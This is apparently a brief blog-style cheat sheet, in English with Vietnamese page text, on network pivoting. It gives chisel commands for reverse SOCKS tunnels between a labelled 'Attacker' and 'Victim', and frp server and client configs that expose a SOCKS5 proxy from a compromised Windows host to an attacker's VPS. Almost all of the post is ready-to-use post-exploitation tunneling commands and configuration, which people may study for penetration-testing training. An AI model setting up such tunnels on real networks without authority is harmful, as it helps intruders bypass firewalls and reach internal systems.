chisel
Ataccker: chisel server -p 8000 --reverseVictim: chisel client 192.168.2.102:8000 R:socks
Victim: chisel server -p <PORT> --socks5
Attacker: chisel client <SERVER_IP>:<SERVER_PORT> [local_port]:socks
Example:
Victim: chisel server -p 8000 --socks5
Attacker: chisel client 192.168.2.108:8000 5000:socks or chisel client 192.168.2.108:8000 socks (1080 default port)
frp
VPS: x.x.x.x
Victim: 192.168.2.108 (Windows)
frp is a fast reverse proxy that allows you to expose a local server located behind a NAT or firewall to the Internet. It currently supports TCP and UDP, as well as HTTP and HTTPS protocols, enabling requests to be forwarded to internal services via domain name.
frps : frp server
frpc: frp client
On Attacker server
We check CPU Architecture: lscpu
Select suitable version with attacker server
Now, config frps.ini file
[common]
bind_address = 0.0.0.0
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = xxxxx
On Victim
Now, config frpc.ini file
[common]
server_addr = x.x.x.x # attacker ip
server_port = 7000
pool_count = 5
[plugin_socks]
type = tcp
remote_port = 46075
plugin = socks5
plugin_user = admin
plugin_passwd = xxxxx
use_encryption = true
use_compression = true
Config in proxifier
Nhận xét
Đăng nhận xét
Toản Đăng ơi! Có nhật xét mới